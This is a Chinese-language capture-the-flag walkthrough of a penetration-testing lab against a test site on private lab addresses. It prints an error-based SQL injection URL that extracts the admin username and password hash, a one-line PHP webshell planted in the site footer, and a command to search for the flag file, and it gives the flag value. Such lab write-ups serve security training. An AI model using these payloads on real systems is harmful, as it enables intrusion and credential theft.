11-在线挑战详细攻略-《渗透测试笔记》
本题目:获取ww.test.ichunqiu后台登录密码。
本文作者:i春秋作家——独狼1927
Step 01
> 目标地址:172.16.12.2 172.16.12.3(注意:本实验中一共有两个目标地址) 本机地址:172.16.11.2 第一题的要求是获取ww.test.ichunqiu后台登录密码。 首先打开浏览器,进入首页ww.test.ichunqiu, 自己注册一个账户,进入 [会员中心],点击左侧菜单 [专题管理] 下的 [创建专题],详情如下图所示:



http://www.test.ichunqiu/member/special.php?
job=show_BBSiframe&type=myatc&id=12&
TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,
((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23
请求完毕后可以很明显的看出,响应包返回的报错信息中,包含了管理员的用户名和一部分密码hash值,不过MD5长度不够,没关系,继续往下看;

http://www.test.ichunqiu/member/special.php?
job=show_BBSiframe&type=myatc&id=12&
TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0,
((select concat(password) from qb_members limit 0,1))),0) %23


Step 02
> 第二题的要求是获取目标服务器1管理员桌面的Flag文件信息。 打开后台地址,输入之前获得的管理员用户名和密码;(后台地址是/admin,不会的童鞋用想念御剑一类的工具一跑就出来了)

<?php @assert($_POST['ichunqiu']);?>
注意:这里不能使用eval,否则会被截断,会木马无法正常执行,不信你可以试一试~
然后点击页面下方的 [保存] 设置进行保存。一般情况下,网站页面的底部都会放网站备案信息,所以把一句话木马放在这里,方便利用。








dir /s *flag*.txt
即可找到桌面文件下的Flag文件,type一下就能看到flag值。
这里特别说明一下,Flag文件中的内容是Key{636bb37e},但是在提交第二题答案的时候,只需要提交大括号中的8位字符即可,否则你永远得不了100分~

Step 03
> 第三题的要求是获取网站论坛数据库中admin的盐值,注意,不是网站数据库,是论坛数据库! 论坛的地址是bbs.test.ichunqiu, IP地址是172.16.12.3 在网站目录下发现一个dedecms_bak文件夹,该目录下的/data/common.inc.php文件就是论坛数据库的配置文件,准确说是配置文件的备份,里面有连接数据库需要的有用信息:





关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 9月3日是一个值得永远纪念的日子 7992109
- 2 各地高考分数线出炉 7960755
- 3 女生高考288分全家欢呼:最好的一次 7992128
- 4 6部门发布19条举措加强金融支持 7968502
- 5 一个班3人高考成绩屏蔽 老师们沸腾 7984207
- 6 男生复读3年高考查分喜极而泣 7968417
- 7 湖北高二学生参加高考 数学满分 7804217
- 8 广东高考分数线公布 7889738
- 9 《酱园弄》票房口碑双崩盘 7952922
- 10 北京高考分数线公布 7976472